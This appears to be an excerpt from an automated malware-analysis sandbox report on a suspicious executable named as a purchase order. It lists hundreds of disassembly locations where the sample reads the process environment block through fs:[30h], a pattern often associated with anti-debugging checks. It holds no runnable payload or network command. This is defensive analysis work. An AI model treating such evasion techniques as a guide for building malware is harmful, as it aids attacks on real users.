Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A14260 mov eax, dword ptr fs:[00000030h]	9_2_01A14260
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A14260 mov eax, dword ptr fs:[00000030h]	9_2_01A14260
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0826B mov eax, dword ptr fs:[00000030h]	9_2_01A0826B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC0274 mov eax, dword ptr fs:[00000030h]	9_2_01AC0274
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A98243 mov eax, dword ptr fs:[00000030h]	9_2_01A98243
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A98243 mov ecx, dword ptr fs:[00000030h]	9_2_01A98243
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0A250 mov eax, dword ptr fs:[00000030h]	9_2_01A0A250
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A16259 mov eax, dword ptr fs:[00000030h]	9_2_01A16259
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACA250 mov eax, dword ptr fs:[00000030h]	9_2_01ACA250
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACA250 mov eax, dword ptr fs:[00000030h]	9_2_01ACA250
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A905A7 mov eax, dword ptr fs:[00000030h]	9_2_01A905A7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A905A7 mov eax, dword ptr fs:[00000030h]	9_2_01A905A7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A905A7 mov eax, dword ptr fs:[00000030h]	9_2_01A905A7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A345B1 mov eax, dword ptr fs:[00000030h]	9_2_01A345B1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A345B1 mov eax, dword ptr fs:[00000030h]	9_2_01A345B1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A12582 mov eax, dword ptr fs:[00000030h]	9_2_01A12582
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A12582 mov ecx, dword ptr fs:[00000030h]	9_2_01A12582
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A44588 mov eax, dword ptr fs:[00000030h]	9_2_01A44588
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E59C mov eax, dword ptr fs:[00000030h]	9_2_01A4E59C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A125E0 mov eax, dword ptr fs:[00000030h]	9_2_01A125E0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]	9_2_01A3E5E7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C5ED mov eax, dword ptr fs:[00000030h]	9_2_01A4C5ED
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C5ED mov eax, dword ptr fs:[00000030h]	9_2_01A4C5ED
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E5CF mov eax, dword ptr fs:[00000030h]	9_2_01A4E5CF
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E5CF mov eax, dword ptr fs:[00000030h]	9_2_01A4E5CF
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A165D0 mov eax, dword ptr fs:[00000030h]	9_2_01A165D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A5D0 mov eax, dword ptr fs:[00000030h]	9_2_01A4A5D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A5D0 mov eax, dword ptr fs:[00000030h]	9_2_01A4A5D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20535 mov eax, dword ptr fs:[00000030h]	9_2_01A20535
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20535 mov eax, dword ptr fs:[00000030h]	9_2_01A20535
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20535 mov eax, dword ptr fs:[00000030h]	9_2_01A20535
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20535 mov eax, dword ptr fs:[00000030h]	9_2_01A20535
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20535 mov eax, dword ptr fs:[00000030h]	9_2_01A20535
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20535 mov eax, dword ptr fs:[00000030h]	9_2_01A20535
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E53E mov eax, dword ptr fs:[00000030h]	9_2_01A3E53E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E53E mov eax, dword ptr fs:[00000030h]	9_2_01A3E53E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E53E mov eax, dword ptr fs:[00000030h]	9_2_01A3E53E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E53E mov eax, dword ptr fs:[00000030h]	9_2_01A3E53E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3E53E mov eax, dword ptr fs:[00000030h]	9_2_01A3E53E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA6500 mov eax, dword ptr fs:[00000030h]	9_2_01AA6500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4500 mov eax, dword ptr fs:[00000030h]	9_2_01AE4500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4500 mov eax, dword ptr fs:[00000030h]	9_2_01AE4500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4500 mov eax, dword ptr fs:[00000030h]	9_2_01AE4500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4500 mov eax, dword ptr fs:[00000030h]	9_2_01AE4500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4500 mov eax, dword ptr fs:[00000030h]	9_2_01AE4500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4500 mov eax, dword ptr fs:[00000030h]	9_2_01AE4500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AE4500 mov eax, dword ptr fs:[00000030h]	9_2_01AE4500
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4656A mov eax, dword ptr fs:[00000030h]	9_2_01A4656A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4656A mov eax, dword ptr fs:[00000030h]	9_2_01A4656A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4656A mov eax, dword ptr fs:[00000030h]	9_2_01A4656A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18550 mov eax, dword ptr fs:[00000030h]	9_2_01A18550
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18550 mov eax, dword ptr fs:[00000030h]	9_2_01A18550
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A164AB mov eax, dword ptr fs:[00000030h]	9_2_01A164AB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A444B0 mov ecx, dword ptr fs:[00000030h]	9_2_01A444B0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9A4B0 mov eax, dword ptr fs:[00000030h]	9_2_01A9A4B0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACA49A mov eax, dword ptr fs:[00000030h]	9_2_01ACA49A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A104E5 mov ecx, dword ptr fs:[00000030h]	9_2_01A104E5
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0E420 mov eax, dword ptr fs:[00000030h]	9_2_01A0E420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0E420 mov eax, dword ptr fs:[00000030h]	9_2_01A0E420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0E420 mov eax, dword ptr fs:[00000030h]	9_2_01A0E420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0C427 mov eax, dword ptr fs:[00000030h]	9_2_01A0C427
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96420 mov eax, dword ptr fs:[00000030h]	9_2_01A96420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96420 mov eax, dword ptr fs:[00000030h]	9_2_01A96420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96420 mov eax, dword ptr fs:[00000030h]	9_2_01A96420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96420 mov eax, dword ptr fs:[00000030h]	9_2_01A96420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96420 mov eax, dword ptr fs:[00000030h]	9_2_01A96420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96420 mov eax, dword ptr fs:[00000030h]	9_2_01A96420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A96420 mov eax, dword ptr fs:[00000030h]	9_2_01A96420
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A430 mov eax, dword ptr fs:[00000030h]	9_2_01A4A430
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A48402 mov eax, dword ptr fs:[00000030h]	9_2_01A48402
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A48402 mov eax, dword ptr fs:[00000030h]	9_2_01A48402
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A48402 mov eax, dword ptr fs:[00000030h]	9_2_01A48402
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9C460 mov ecx, dword ptr fs:[00000030h]	9_2_01A9C460
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3A470 mov eax, dword ptr fs:[00000030h]	9_2_01A3A470
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3A470 mov eax, dword ptr fs:[00000030h]	9_2_01A3A470
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3A470 mov eax, dword ptr fs:[00000030h]	9_2_01A3A470
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4E443 mov eax, dword ptr fs:[00000030h]	9_2_01A4E443
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A3245A mov eax, dword ptr fs:[00000030h]	9_2_01A3245A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ACA456 mov eax, dword ptr fs:[00000030h]	9_2_01ACA456
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A0645D mov eax, dword ptr fs:[00000030h]	9_2_01A0645D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AC47A0 mov eax, dword ptr fs:[00000030h]	9_2_01AC47A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A107AF mov eax, dword ptr fs:[00000030h]	9_2_01A107AF
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AB678E mov eax, dword ptr fs:[00000030h]	9_2_01AB678E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9E7E1 mov eax, dword ptr fs:[00000030h]	9_2_01A9E7E1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A327ED mov eax, dword ptr fs:[00000030h]	9_2_01A327ED
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A327ED mov eax, dword ptr fs:[00000030h]	9_2_01A327ED
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A327ED mov eax, dword ptr fs:[00000030h]	9_2_01A327ED
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A147FB mov eax, dword ptr fs:[00000030h]	9_2_01A147FB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A147FB mov eax, dword ptr fs:[00000030h]	9_2_01A147FB
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1C7C0 mov eax, dword ptr fs:[00000030h]	9_2_01A1C7C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A907C3 mov eax, dword ptr fs:[00000030h]	9_2_01A907C3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C720 mov eax, dword ptr fs:[00000030h]	9_2_01A4C720
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C720 mov eax, dword ptr fs:[00000030h]	9_2_01A4C720
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4273C mov eax, dword ptr fs:[00000030h]	9_2_01A4273C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4273C mov ecx, dword ptr fs:[00000030h]	9_2_01A4273C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4273C mov eax, dword ptr fs:[00000030h]	9_2_01A4273C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8C730 mov eax, dword ptr fs:[00000030h]	9_2_01A8C730
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C700 mov eax, dword ptr fs:[00000030h]	9_2_01A4C700
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10710 mov eax, dword ptr fs:[00000030h]	9_2_01A10710
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A40710 mov eax, dword ptr fs:[00000030h]	9_2_01A40710
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A18770 mov eax, dword ptr fs:[00000030h]	9_2_01A18770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A20770 mov eax, dword ptr fs:[00000030h]	9_2_01A20770
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4674D mov esi, dword ptr fs:[00000030h]	9_2_01A4674D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4674D mov eax, dword ptr fs:[00000030h]	9_2_01A4674D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4674D mov eax, dword ptr fs:[00000030h]	9_2_01A4674D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A10750 mov eax, dword ptr fs:[00000030h]	9_2_01A10750
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9E75D mov eax, dword ptr fs:[00000030h]	9_2_01A9E75D
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52750 mov eax, dword ptr fs:[00000030h]	9_2_01A52750
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52750 mov eax, dword ptr fs:[00000030h]	9_2_01A52750
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A94755 mov eax, dword ptr fs:[00000030h]	9_2_01A94755
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4C6A6 mov eax, dword ptr fs:[00000030h]	9_2_01A4C6A6
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A466B0 mov eax, dword ptr fs:[00000030h]	9_2_01A466B0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A14690 mov eax, dword ptr fs:[00000030h]	9_2_01A14690
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A14690 mov eax, dword ptr fs:[00000030h]	9_2_01A14690
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A906F1 mov eax, dword ptr fs:[00000030h]	9_2_01A906F1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A906F1 mov eax, dword ptr fs:[00000030h]	9_2_01A906F1
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A8E6F2
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A8E6F2
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A8E6F2
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]	9_2_01A8E6F2
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A6C7 mov ebx, dword ptr fs:[00000030h]	9_2_01A4A6C7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A6C7 mov eax, dword ptr fs:[00000030h]	9_2_01A4A6C7
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A46620 mov eax, dword ptr fs:[00000030h]	9_2_01A46620
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A48620 mov eax, dword ptr fs:[00000030h]	9_2_01A48620
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2E627 mov eax, dword ptr fs:[00000030h]	9_2_01A2E627
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1262C mov eax, dword ptr fs:[00000030h]	9_2_01A1262C
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E609 mov eax, dword ptr fs:[00000030h]	9_2_01A8E609
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2260B mov eax, dword ptr fs:[00000030h]	9_2_01A2260B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2260B mov eax, dword ptr fs:[00000030h]	9_2_01A2260B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2260B mov eax, dword ptr fs:[00000030h]	9_2_01A2260B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2260B mov eax, dword ptr fs:[00000030h]	9_2_01A2260B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2260B mov eax, dword ptr fs:[00000030h]	9_2_01A2260B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2260B mov eax, dword ptr fs:[00000030h]	9_2_01A2260B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2260B mov eax, dword ptr fs:[00000030h]	9_2_01A2260B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A52619 mov eax, dword ptr fs:[00000030h]	9_2_01A52619
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD866E mov eax, dword ptr fs:[00000030h]	9_2_01AD866E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AD866E mov eax, dword ptr fs:[00000030h]	9_2_01AD866E
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A660 mov eax, dword ptr fs:[00000030h]	9_2_01A4A660
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A4A660 mov eax, dword ptr fs:[00000030h]	9_2_01A4A660
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A42674 mov eax, dword ptr fs:[00000030h]	9_2_01A42674
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A2C640 mov eax, dword ptr fs:[00000030h]	9_2_01A2C640
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A229A0 mov eax, dword ptr fs:[00000030h]	9_2_01A229A0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A109AD mov eax, dword ptr fs:[00000030h]	9_2_01A109AD
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A109AD mov eax, dword ptr fs:[00000030h]	9_2_01A109AD
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A989B3 mov esi, dword ptr fs:[00000030h]	9_2_01A989B3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A989B3 mov eax, dword ptr fs:[00000030h]	9_2_01A989B3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A989B3 mov eax, dword ptr fs:[00000030h]	9_2_01A989B3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9E9E0 mov eax, dword ptr fs:[00000030h]	9_2_01A9E9E0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A429F9 mov eax, dword ptr fs:[00000030h]	9_2_01A429F9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A429F9 mov eax, dword ptr fs:[00000030h]	9_2_01A429F9
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA69C0 mov eax, dword ptr fs:[00000030h]	9_2_01AA69C0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A9D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A9D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A9D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A9D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A9D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]	9_2_01A1A9D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A449D0 mov eax, dword ptr fs:[00000030h]	9_2_01A449D0
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01ADA9D3 mov eax, dword ptr fs:[00000030h]	9_2_01ADA9D3
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01AA892B mov eax, dword ptr fs:[00000030h]	9_2_01AA892B
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A9892A mov eax, dword ptr fs:[00000030h]	9_2_01A9892A
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E908 mov eax, dword ptr fs:[00000030h]	9_2_01A8E908
Source: C:\Users\user\Desktop\po8909893299832.exe	Code function: 9_2_01A8E908 mov eax, dword ptr fs:[00000030h]	9_2_01A8E908
